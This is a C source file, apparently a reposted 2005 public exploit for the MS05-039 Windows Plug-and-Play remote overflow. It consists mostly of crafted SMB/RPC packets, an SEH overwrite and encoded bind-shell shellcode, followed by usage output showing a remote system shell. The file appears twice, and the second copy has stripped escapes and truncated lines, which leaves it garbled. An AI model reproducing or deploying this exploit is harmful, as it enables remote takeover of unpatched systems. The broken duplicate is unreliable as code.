/* HOD-ms05039-pnp-expl.c: 2005-08-10: PUBLIC v.0.2
*
* Copyright (c) 2005 houseofdabus.
*
* (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow
* Universal Exploit + no crash shellcode
*
* .::[ houseofdabus ]::.
*
* ---------------------------------------------------------------------
* Description:
* A remote code execution and local elevation of privilege
* vulnerability exists in Plug and Play that could allow an
* attacker who successfully exploited this vulnerability to take
* complete control of the affected system.
*
* This is a remote code execution and local privilege elevation
* vulnerability. On Windows 2000, an anonymous attacker could
* remotely try to exploit this vulnerability.
*
* On Windows XP Service Pack 1, only an authenticated user could
* remotely try to exploit this vulnerability.
* On Window XP Service Pack 2 and Windows Server 2003, only an
* administrator can remotely access the affected component.
* Therefore, on Windows XP Service Pack 2 and Windows Server 2003,
* this is strictly a local privilege elevation vulnerability.
* An anonymous user cannot remotely attempt to exploit this
* vulnerability on Windows XP Service Pack 2 and Windows
* Server 2003.
*
* ---------------------------------------------------------------------
* Solution:
* www.microsoft.com/technet/security/Bulletin/MS05-039.mspx
*
* ---------------------------------------------------------------------
* Systems Affected:
* - Windows Server 2003, SP1
* - Windows XP SP1, SP2
* - Windows 2000 SP4
*
* ---------------------------------------------------------------------
* Tested on:
* - Windows 2000 SP4
*
* ---------------------------------------------------------------------
* Compile:
*
* Win32/VC++ : cl -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c
* Win32/cygwin: gcc -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c
* Linux : gcc -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c
*
* ---------------------------------------------------------------------
* Example:
*
* C:>HOD-ms05039-pnp-expl 192.168.0.1 7777
*
* connecting to 192.168.0.22:445...ok
* null session...ok
* bind pipe...ok
* sending crafted packet...ok
* check your shell on 192.168.0.1:7777
* Ctrl+C
*
* C:>nc 192.168.0.1 7777
*
* Microsoft Windows 2000 [Version 5.00.2195]
* (C) Copyright 1985-2000 Microsoft Corp.
*
* C:WINNTsystem32>
*
* ---------------------------------------------------------------------
*
* This is provided as proof-of-concept code only for educational
* purposes and testing by authorized individuals with permission
* to do so.
*
*/
/* #define _WIN32 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef _WIN32
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
#else
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <netdb.h>
#endif
unsigned char SMB_Negotiate[] =
"x00x00x00x85xFFx53x4Dx42x72x00x00x00x00x18x53xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE"
"x00x00x00x00x00x62x00x02x50x43x20x4Ex45x54x57x4F"
"x52x4Bx20x50x52x4Fx47x52x41x4Dx20x31x2Ex30x00x02"
"x4Cx41x4Ex4Dx41x4Ex31x2Ex30x00x02x57x69x6Ex64x6F"
"x77x73x20x66x6Fx72x20x57x6Fx72x6Bx67x72x6Fx75x70"
"x73x20x33x2Ex31x61x00x02x4Cx4Dx31x2Ex32x58x30x30"
"x32x00x02x4Cx41x4Ex4Dx41x4Ex32x2Ex31x00x02x4Ex54"
"x20x4Cx4Dx20x30x2Ex31x32x00";
unsigned char SMB_SessionSetupAndX[] =
"x00x00x00xA4xFFx53x4Dx42x73x00x00x00x00x18x07xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE"
"x00x00x10x00x0CxFFx00xA4x00x04x11x0Ax00x00x00x00"
"x00x00x00x20x00x00x00x00x00xD4x00x00x80x69x00x4E"
"x54x4Cx4Dx53x53x50x00x01x00x00x00x97x82x08xE0x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x57x00x69x00x6Ex00x64x00x6Fx00x77x00x73x00x20x00"
"x32x00x30x00x30x00x30x00x20x00x32x00x31x00x39x00"
"x35x00x00x00x57x00x69x00x6Ex00x64x00x6Fx00x77x00"
"x73x00x20x00x32x00x30x00x30x00x30x00x20x00x35x00"
"x2Ex00x30x00x00x00x00x00";
unsigned char SMB_SessionSetupAndX2[] =
"x00x00x00xDAxFFx53x4Dx42x73x00x00x00x00x18x07xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE"
"x00x08x20x00x0CxFFx00xDAx00x04x11x0Ax00x00x00x00"
"x00x00x00x57x00x00x00x00x00xD4x00x00x80x9Fx00x4E"
"x54x4Cx4Dx53x53x50x00x03x00x00x00x01x00x01x00x46"
"x00x00x00x00x00x00x00x47x00x00x00x00x00x00x00x40"
"x00x00x00x00x00x00x00x40x00x00x00x06x00x06x00x40"
"x00x00x00x10x00x10x00x47x00x00x00x15x8Ax88xE0x48"
"x00x4Fx00x44x00x00xEDx41x2Cx27x86x26xD2x59xA0xB3"
"x5ExAAx00x88x6FxC5x57x00x69x00x6Ex00x64x00x6Fx00"
"x77x00x73x00x20x00x32x00x30x00x30x00x30x00x20x00"
"x32x00x31x00x39x00x35x00x00x00x57x00x69x00x6Ex00"
"x64x00x6Fx00x77x00x73x00x20x00x32x00x30x00x30x00"
"x30x00x20x00x35x00x2Ex00x30x00x00x00x00x00";
unsigned char SMB_TreeConnectAndX[] =
"x00x00x00x5AxFFx53x4Dx42x75x00x00x00x00x18x07xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE"
"x00x08x30x00x04xFFx00x5Ax00x08x00x01x00x2Fx00x00";
unsigned char SMB_TreeConnectAndX_[] =
"x00x00x3Fx3Fx3Fx3Fx3Fx00";
/* browser */
unsigned char SMB_PipeRequest_browser[] =
"x00x00x00x66xFFx53x4Dx42xA2x00x00x00x00x18x07xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x08x78x04"
"x00x08x40x00x18xFFx00xDExDEx00x10x00x16x00x00x00"
"x00x00x00x00x9Fx01x02x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x01x00x00x00x40x00x00x00"
"x02x00x00x00x03x13x00x00x5Cx00x62x00x72x00x6Fx00"
"x77x00x73x00x65x00x72x00x00x00";
unsigned char SMB_PNPEndpoint[] =
/* 8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0: pnp */
"x00x00x00x9CxFFx53x4Dx42x25x00x00x00x00x18x07xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x08x78x04"
"x00x08x50x00x10x00x00x48x00x00x00x00x10x00x00x00"
"x00x00x00x00x00x00x00x00x00x54x00x48x00x54x00x02"
"x00x26x00x00x40x59x00x00x5Cx00x50x00x49x00x50x00"
"x45x00x5Cx00x00x00x40x00x05x00x0Bx03x10x00x00x00"
"x48x00x00x00x01x00x00x00xB8x10xB8x10x00x00x00x00"
"x01x00x00x00x00x00x01x00x40x4Ex9Fx8Dx3DxA0xCEx11"
"x8Fx69x08x00x3Ex30x05x1Bx01x00x00x00x04x5Dx88x8A"
"xEBx1CxC9x11x9FxE8x08x00x2Bx10x48x60x02x00x00x00";
unsigned char RPC_call[] =
"x00x00x08x90xFFx53x4Dx42x25x00x00x00x00x18x07xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x08x78x04"
"x00x08x60x00x10x00x00x3Cx08x00x00x00x01x00x00x00"
"x00x00x00x00x00x00x00x00x00x54x00x3Cx08x54x00x02"
"x00x26x00x00x40x4Dx08x00x5Cx00x50x00x49x00x50x00"
"x45x00x5Cx00x00x00x40x00x05x00x00x03x10x00x00x00"
"x3Cx08x00x00x01x00x00x00x24x08x00x00x00x00x36x00"
"x11x00x00x00x00x00x00x00x11x00x00x00x52x00x4Fx00"
"x4Fx00x54x00x5Cx00x53x00x59x00x53x00x54x00x45x00"
"x4Dx00x5Cx00x30x00x30x00x30x00x30x00x00x00x00x00"
"xFFxFFx00x00xE0x07x00x00x00x00x00x00x00x00x00x00"
"xC0x07x00x00x00x00x00x00x90x90x90x90x90x90x90x90"
"xEBx08x90x90x67x15x7ax76xEBx08x90x90x67x15x7ax76"
"xEBx08x90x90x67x15x7ax76xEBx08x90x90x67x15x7ax76"
"xEBx08x90x90x67x15x7ax76xEBx08x90x90x67x15x7ax76"
"xEBx08x90x90x67x15x7ax76xEBx08x90x90x67x15x7ax76"
/* jmp over - entry point */
"xEBx08x90x90"
/* pop reg; pop reg; retn; - umpnpmgr.dll */
"x67x15x7ax76" /* 0x767a1567 */
/* jmp ebx - umpnpmgr.dll
"x6fx36x7ax76" */
"xEBx08x90x90x67x15x7ax76"
"x90x90x90x90x90x90x90xEBx08x90x90x48x4Fx44x88x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90";
unsigned char RPC_call_end[] =
"xE0x07x00x00x04x00x00x00x00x00x00x00";
unsigned char bind_shellcode[] =
"x29xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x19"
"xf5x04x37x83xebxfcxe2xf4xe5x9fxefx7axf1x0cxfbxc8"
"xe6x95x8fx5bx3dxd1x8fx72x25x7ex78x32x61xf4xebxbc"
"x56xedx8fx68x39xf4xefx7ex92xc1x8fx36xf7xc4xc4xae"
"xb5x71xc4x43x1ex34xcex3ax18x37xefxc3x22xa1x20x1f"
"x6cx10x8fx68x3dxf4xefx51x92xf9x4fxbcx46xe9x05xdc"
"x1axd9x8fxbex75xd1x18x56xdaxc4xdfx53x92xb6x34xbc"
"x59xf9x8fx47x05x58x8fx77x11xabx6cxb9x57xfbxe8x67"
"xe6x23x62x64x7fx9dx37x05x71x82x77x05x46xa1xfbxe7"
"x71x3exe9xcbx22xa5xfbxe1x46x7cxe1x51x98x18x0cx35"
"x4cx9fx06xc8xc9x9dxddx3execx58x53xc8xcfxa6x57x64"
"x4axa6x47x64x5axa6xfbxe7x7fx9dx1ax55x7fxa6x8dxd6"
"x8cx9dxa0x2dx69x32x53xc8xcfx9fx14x66x4cx0axd4x5f"
"xbdx58x2axdex4ex0axd2x64x4cx0axd4x5fxfcxbcx82x7e"
"x4ex0axd2x67x4dxa1x51xc8xc9x66x6cxd0x60x33x7dx60"
"xe6x23x51xc8xc9x93x6ex53x7fx9dx67x5ax90x10x6ex67"
"x40xdcxc8xbexfex9fx40xbexfbxc4xc4xc4xb3x0bx46x1a"
"xe7xb7x28xa4x94x8fx3cx9cxb2x5ex6cx45xe7x46x12xc8"
"x6cxb1xfbxe1x42xa2x56x66x48xa4x6ex36x48xa4x51x66"
"xe6x25x6cx9axc0xf0xcax64xe6x23x6exc8xe6xc2xfbxe7"
"x92xa2xf8xb4xddx91xfbxe1x4bx0axd4x5fxf6x3bxe4x57"
"x4ax0axd2xc8xc9xf5x04x37";
#define SET_PORTBIND_PORT(buf, port)
*(unsigned short *)(((buf)+186)) = (port)
void
convert_name(char *out, char *name)
{
unsigned long len;
len = strlen(name);
out += len * 2 - 1;
while (len--) {
*out-- = 'x00';
*out-- = name[len];
}
}
int
main (int argc, char **argv)
{
struct sockaddr_in addr;
struct hostent *he;
int len;
int sockfd;
unsigned short smblen;
unsigned short bindport;
unsigned char tmp[1024];
unsigned char packet[4096];
unsigned char *ptr;
char recvbuf[4096];
#ifdef _WIN32
WSADATA wsa;
WSAStartup(MAKEWORD(2,0), &wsa);
#endif
printf("n (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflown");
printf("t Universal Exploit + no crash shellcodennn");
printf("t Copyright (c) 2005 .: houseofdabus :.nnn");
if (argc < 3) {
printf("%s <host> <bind port>n", argv[0]);
exit(0);
}
if ((he = gethostbyname(argv[1])) == NULL) {
printf("[-] Unable to resolve %sn", argv[1]);
exit(0);
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
printf("[-] socket failedn");
exit(0);
}
addr.sin_family = AF_INET;
addr.sin_port = htons(445);
addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(addr.sin_zero), '', 8);
printf("n connecting to %s:445...", argv[1]);
if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) {
printf("n[-] connect failedn");
exit(0);
}
printf("okn");
printf(" null session...");
if (send(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) {
printf("n[-] send failedn");
exit(0);
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
printf("n[-] failedn");
exit(0);
}
if (send(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) {
printf("n[-] send failedn");
exit(0);
}
len = recv(sockfd, recvbuf, 4096, 0);
if (len <= 10) {
printf("n[-] failedn");
exit(0);
}
if (send(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) {
printf("n[-] send failedn");
exit(0);
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
printf("n[-] failedn");
exit(0);
}
ptr = packet;
memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);
ptr += sizeof(SMB_TreeConnectAndX)-1;
sprintf(tmp, "%sIPC$ ", argv[1]);
convert_name(ptr, tmp);
smblen = strlen(tmp)*2;
ptr += smblen;
smblen += 9;
memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);
memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);
ptr += sizeof(SMB_TreeConnectAndX_)-1;
smblen = ptr-packet;
smblen -= 4;
memcpy(packet+3, &smblen, 1);
if (send(sockfd, packet, ptr-packet, 0) < 0) {
printf("n[-] send failedn");
exit(0);
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
printf("n[-] failedn");
exit(0);
}
printf("okn");
printf(" bind pipe...");
if (send(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) {
printf("n[-] send failedn");
exit(0);
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
printf("n[-] failedn");
exit(0);
}
if (send(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) {
printf("n[-] send failedn");
exit(0);
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
printf("n[-] failedn");
exit(0);
}
printf("okn");
printf(" sending crafted packet...");
// nop
ptr = packet;
memset(packet, 'x90', sizeof(packet));
// header & offsets
memcpy(ptr, RPC_call, sizeof(RPC_call)-1);
ptr += sizeof(RPC_call)-1;
// shellcode
bindport = (unsigned short)atoi(argv[2]);
bindport ^= 0x0437;
SET_PORTBIND_PORT(bind_shellcode, htons(bindport));
memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);
// end of packet
memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,
RPC_call_end,
sizeof(RPC_call_end)-1);
// sending...
if (send(sockfd, packet, 2196, 0) < 0) {
printf("n[-] send failedn");
exit(0);
}
printf("okn");
printf(" check your shell on %s:%in", argv[1], atoi(argv[2]));
recv(sockfd, recvbuf, 4096, 0);
return 0;
}
*
* Copyright (c) 2005 houseofdabus.
*
* (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow
* Universal Exploit + no crash shellcode
*
* .::[ houseofdabus ]::.
*
* ---------------------------------------------------------------------
* Description:
* A remote code execution and local elevation of privilege
* vulnerability exists in Plug and Play that could allow an
* attacker who successfully exploited this vulnerability to take
* complete control of the affected system.
*
* This is a remote code execution and local privilege elevation
* vulnerability. On Windows 2000, an anonymous attacker could
* remotely try to exploit this vulnerability.
*
* On Windows XP Service Pack 1, only an authenticated user could
* remotely try to exploit this vulnerability.
* On Window XP Service Pack 2 and Windows Server 2003, only an
* administrator can remotely access the affected component.
* Therefore, on Windows XP Service Pack 2 and Windows Server 2003,
* this is strictly a local privilege elevation vulnerability.
* An anonymous user cannot remotely attempt to exploit this
* vulnerability on Windows XP Service Pack 2 and Windows
* Server 2003.
*
* ---------------------------------------------------------------------
* Solution:
* www.microsoft.com/technet/security/Bulletin/MS05-039.mspx
*
* ---------------------------------------------------------------------
* Systems Affected:
* - Windows Server 2003, SP1
* - Windows XP SP1, SP2
* - Windows 2000 SP4
*
* ---------------------------------------------------------------------
* Tested on:
* - Windows 2000 SP4
*
* ---------------------------------------------------------------------
* Compile:
*
* Win32/VC++ : cl -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c
* Win32/cygwin: gcc -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c
* Linux : gcc -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c
*
* ---------------------------------------------------------------------
* Example:
*
* C:>HOD-ms05039-pnp-expl 192.168.0.1 7777
*
*
*
*
*
*
* Ctrl+C
*
* C:>nc 192.168.0.1 7777
*
* Microsoft Windows 2000 [Version 5.00.2195]
* (C) Copyright 1985-2000 Microsoft Corp.
*
* C:WINNTsystem32>
*
* ---------------------------------------------------------------------
*
* This is provided as proof-of-concept code only for educational
* purposes and testing by authorized individuals with permission
* to do so.
*
*/
/* #define _WIN32 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef _WIN32
#include <winsock2.h>
#pragma comment(lib, "ws2_32")
#else
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <netdb.h>
#endif
unsigned char SMB_Negotiate[] =
"x00x00x00x85xFFx53x4Dx42x72x00x00x00x00x18x53xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE"
"x00x00x00x00x00x62x00x02x50x43x20x4Ex45x54x57x4F"
"x52x4Bx20x50x52x4Fx47x52x41x4Dx20x31x2Ex30x00x02"
"x4Cx41x4Ex4Dx41x4Ex31x2Ex30x00x02x57x69x6Ex64x6F"
"x77x73x20x66x6Fx72x20x57x6Fx72x6Bx67x72x6Fx75x70"
"x73x20x33x2Ex31x61x00x02x4Cx4Dx31x2Ex32x58x30x30"
"x32x00x02x4Cx41x4Ex4Dx41x4Ex32x2Ex31x00x02x4Ex54"
"x20x4Cx4Dx20x30x2Ex31x32x00";
unsigned char SMB_SessionSetupAndX[] =
"x00x00x00xA4xFFx53x4Dx42x73x00x00x00x00x18x07xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE"
"x00x00x10x00x0CxFFx00xA4x00x04x11x0Ax00x00x00x00"
"x00x00x00x20x00x00x00x00x00xD4x00x00x80x69x00x4E"
"x54x4Cx4Dx53x53x50x00x01x00x00x00x97x82x08xE0x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x57x00x69x00x6Ex00x64x00x6Fx00x77x00x73x00x20x00"
"x32x00x30x00x30x00x30x00x20x00x32x00x31x00x39x00"
"x35x00x00x00x57x00x69x00x6Ex00x64x00x6Fx00x77x00"
"x73x00x20x00x32x00x30x00x30x00x30x00x20x00x35x00"
"x2Ex00x30x00x00x00x00x00";
unsigned char SMB_SessionSetupAndX2[] =
"x00x00x00xDAxFFx53x4Dx42x73x00x00x00x00x18x07xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE"
"x00x08x20x00x0CxFFx00xDAx00x04x11x0Ax00x00x00x00"
"x00x00x00x57x00x00x00x00x00xD4x00x00x80x9Fx00x4E"
"x54x4Cx4Dx53x53x50x00x03x00x00x00x01x00x01x00x46"
"x00x00x00x00x00x00x00x47x00x00x00x00x00x00x00x40"
"x00x00x00x00x00x00x00x40x00x00x00x06x00x06x00x40"
"x00x00x00x10x00x10x00x47x00x00x00x15x8Ax88xE0x48"
"x00x4Fx00x44x00x00xEDx41x2Cx27x86x26xD2x59xA0xB3"
"x5ExAAx00x88x6FxC5x57x00x69x00x6Ex00x64x00x6Fx00"
"x77x00x73x00x20x00x32x00x30x00x30x00x30x00x20x00"
"x32x00x31x00x39x00x35x00x00x00x57x00x69x00x6Ex00"
"x64x00x6Fx00x77x00x73x00x20x00x32x00x30x00x30x00"
"x30x00x20x00x35x00x2Ex00x30x00x00x00x00x00";
unsigned char SMB_TreeConnectAndX[] =
"x00x00x00x5AxFFx53x4Dx42x75x00x00x00x00x18x07xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00xFFxFE"
"x00x08x30x00x04xFFx00x5Ax00x08x00x01x00x2Fx00x00";
unsigned char SMB_TreeConnectAndX_[] =
"x00x00x3Fx3Fx3Fx3Fx3Fx00";
/* browser */
unsigned char SMB_PipeRequest_browser[] =
"x00x00x00x66xFFx53x4Dx42xA2x00x00x00x00x18x07xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x08x78x04"
"x00x08x40x00x18xFFx00xDExDEx00x10x00x16x00x00x00"
"x00x00x00x00x9Fx01x02x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x01x00x00x00x40x00x00x00"
"x02x00x00x00x03x13x00x00x5Cx00x62x00x72x00x6Fx00"
"x77x00x73x00x65x00x72x00x00x00";
unsigned char SMB_PNPEndpoint[] =
/* 8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0: pnp */
"x00x00x00x9CxFFx53x4Dx42x25x00x00x00x00x18x07xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x08x78x04"
"x00x08x50x00x10x00x00x48x00x00x00x00x10x00x00x00"
"x00x00x00x00x00x00x00x00x00x54x00x48x00x54x00x02"
"x00x26x00x00x40x59x00x00x5Cx00x50x00x49x00x50x00"
"x45x00x5Cx00x00x00x40x00x05x00x0Bx03x10x00x00x00"
"x48x00x00x00x01x00x00x00xB8x10xB8x10x00x00x00x00"
"x01x00x00x00x00x00x01x00x40x4Ex9Fx8Dx3DxA0xCEx11"
"x8Fx69x08x00x3Ex30x05x1Bx01x00x00x00x04x5Dx88x8A"
"xEBx1CxC9x11x9FxE8x08x00x2Bx10x48x60x02x00x00x00";
unsigned char RPC_call[] =
"x00x00x08x90xFFx53x4Dx42x25x00x00x00x00x18x07xC8"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x08x78x04"
"x00x08x60x00x10x00x00x3Cx08x00x00x00x01x00x00x00"
"x00x00x00x00x00x00x00x00x00x54x00x3Cx08x54x00x02"
"x00x26x00x00x40x4Dx08x00x5Cx00x50x00x49x00x50x00"
"x45x00x5Cx00x00x00x40x00x05x00x00x03x10x00x00x00"
"x3Cx08x00x00x01x00x00x00x24x08x00x00x00x00x36x00"
"x11x00x00x00x00x00x00x00x11x00x00x00x52x00x4Fx00"
"x4Fx00x54x00x5Cx00x53x00x59x00x53x00x54x00x45x00"
"x4Dx00x5Cx00x30x00x30x00x30x00x30x00x00x00x00x00"
"xFFxFFx00x00xE0x07x00x00x00x00x00x00x00x00x00x00"
"xC0x07x00x00x00x00x00x00x90x90x90x90x90x90x90x90"
"xEBx08x90x90x67x15x7ax76xEBx08x90x90x67x15x7ax76"
"xEBx08x90x90x67x15x7ax76xEBx08x90x90x67x15x7ax76"
"xEBx08x90x90x67x15x7ax76xEBx08x90x90x67x15x7ax76"
"xEBx08x90x90x67x15x7ax76xEBx08x90x90x67x15x7ax76"
/* jmp over - entry point */
"xEBx08x90x90"
/* pop reg; pop reg; retn; - umpnpmgr.dll */
"x67x15x7ax76" /* 0x767a1567 */
/* jmp ebx - umpnpmgr.dll
"x6fx36x7ax76" */
"xEBx08x90x90x67x15x7ax76"
"x90x90x90x90x90x90x90xEBx08x90x90x48x4Fx44x88x90"
"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90";
unsigned char RPC_call_end[] =
"xE0x07x00x00x04x00x00x00x00x00x00x00";
unsigned char bind_shellcode[] =
"x29xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x19"
"xf5x04x37x83xebxfcxe2xf4xe5x9fxefx7axf1x0cxfbxc8"
"xe6x95x8fx5bx3dxd1x8fx72x25x7ex78x32x61xf4xebxbc"
"x56xedx8fx68x39xf4xefx7ex92xc1x8fx36xf7xc4xc4xae"
"xb5x71xc4x43x1ex34xcex3ax18x37xefxc3x22xa1x20x1f"
"x6cx10x8fx68x3dxf4xefx51x92xf9x4fxbcx46xe9x05xdc"
"x1axd9x8fxbex75xd1x18x56xdaxc4xdfx53x92xb6x34xbc"
"x59xf9x8fx47x05x58x8fx77x11xabx6cxb9x57xfbxe8x67"
"xe6x23x62x64x7fx9dx37x05x71x82x77x05x46xa1xfbxe7"
"x71x3exe9xcbx22xa5xfbxe1x46x7cxe1x51x98x18x0cx35"
"x4cx9fx06xc8xc9x9dxddx3execx58x53xc8xcfxa6x57x64"
"x4axa6x47x64x5axa6xfbxe7x7fx9dx1ax55x7fxa6x8dxd6"
"x8cx9dxa0x2dx69x32x53xc8xcfx9fx14x66x4cx0axd4x5f"
"xbdx58x2axdex4ex0axd2x64x4cx0axd4x5fxfcxbcx82x7e"
"x4ex0axd2x67x4dxa1x51xc8xc9x66x6cxd0x60x33x7dx60"
"xe6x23x51xc8xc9x93x6ex53x7fx9dx67x5ax90x10x6ex67"
"x40xdcxc8xbexfex9fx40xbexfbxc4xc4xc4xb3x0bx46x1a"
"xe7xb7x28xa4x94x8fx3cx9cxb2x5ex6cx45xe7x46x12xc8"
"x6cxb1xfbxe1x42xa2x56x66x48xa4x6ex36x48xa4x51x66"
"xe6x25x6cx9axc0xf0xcax64xe6x23x6exc8xe6xc2xfbxe7"
"x92xa2xf8xb4xddx91xfbxe1x4bx0axd4x5fxf6x3bxe4x57"
"x4ax0axd2xc8xc9xf5x04x37";
#define SET_PORTBIND_PORT(buf, port)
*(unsigned short *)(((buf)+186)) = (port)
void
convert_name(char *out, char *name)
{
unsigned long len;
len = strlen(name);
out += len * 2 - 1;
while (len--) {
*out-- = 'x00';
*out-- = name[len];
}
}
int
main (int argc, char **argv)
{
struct sockaddr_in addr;
struct hostent *he;
int len;
int sockfd;
unsigned short smblen;
unsigned short bindport;
unsigned char tmp[1024];
unsigned char packet[4096];
unsigned char *ptr;
char recvbuf[4096];
#ifdef _WIN32
WSADATA wsa;
WSAStartup(MAKEWORD(2,0), &wsa);
#endif
printf("n (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflown");
printf("t Universal Exploit + no crash shellcodennn");
printf("t Copyright (c) 2005 .: houseofdabus :.nnn");
if (argc < 3) {
printf("%s <host> <bind port>n", argv[0]);
exit(0);
}
if ((he = gethostbyname(argv[1])) == NULL) {
printf("[-] Unable to resolve %sn", argv[1]);
exit(0);
}
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
printf("[-] socket failedn");
exit(0);
}
addr.sin_family = AF_INET;
addr.sin_port = htons(445);
addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(addr.sin_zero), '', 8);
printf("n
if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) {
printf("n[-] connect failedn");
exit(0);
}
printf("okn");
printf("
if (send(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) {
printf("n[-] send failedn");
exit(0);
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
printf("n[-] failedn");
exit(0);
}
if (send(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) {
printf("n[-] send failedn");
exit(0);
}
len = recv(sockfd, recvbuf, 4096, 0);
if (len <= 10) {
printf("n[-] failedn");
exit(0);
}
if (send(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) {
printf("n[-] send failedn");
exit(0);
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
printf("n[-] failedn");
exit(0);
}
ptr = packet;
memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);
ptr += sizeof(SMB_TreeConnectAndX)-1;
sprintf(tmp, "%sIPC$ ", argv[1]);
convert_name(ptr, tmp);
smblen = strlen(tmp)*2;
ptr += smblen;
smblen += 9;
memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);
memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);
ptr += sizeof(SMB_TreeConnectAndX_)-1;
smblen = ptr-packet;
smblen -= 4;
memcpy(packet+3, &smblen, 1);
if (send(sockfd, packet, ptr-packet, 0) < 0) {
printf("n[-] send failedn");
exit(0);
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
printf("n[-] failedn");
exit(0);
}
printf("okn");
printf("
if (send(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) {
printf("n[-] send failedn");
exit(0);
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
printf("n[-] failedn");
exit(0);
}
if (send(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) {
printf("n[-] send failedn");
exit(0);
}
len = recv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) {
printf("n[-] failedn");
exit(0);
}
printf("okn");
printf("
// nop
ptr = packet;
memset(packet, 'x90', sizeof(packet));
// header & offsets
memcpy(ptr, RPC_call, sizeof(RPC_call)-1);
ptr += sizeof(RPC_call)-1;
// shellcode
bindport = (unsigned short)atoi(argv[2]);
bindport ^= 0x0437;
SET_PORTBIND_PORT(bind_shellcode, htons(bindport));
memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1);
// end of packet
memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,
RPC_call_end,
sizeof(RPC_call_end)-1);
// sending...
if (send(sockfd, packet, 2196, 0) < 0) {
printf("n[-] send failedn");
exit(0);
}
printf("okn");
printf("
recv(sockfd, recvbuf, 4096, 0);
return 0;
}
回复Comments
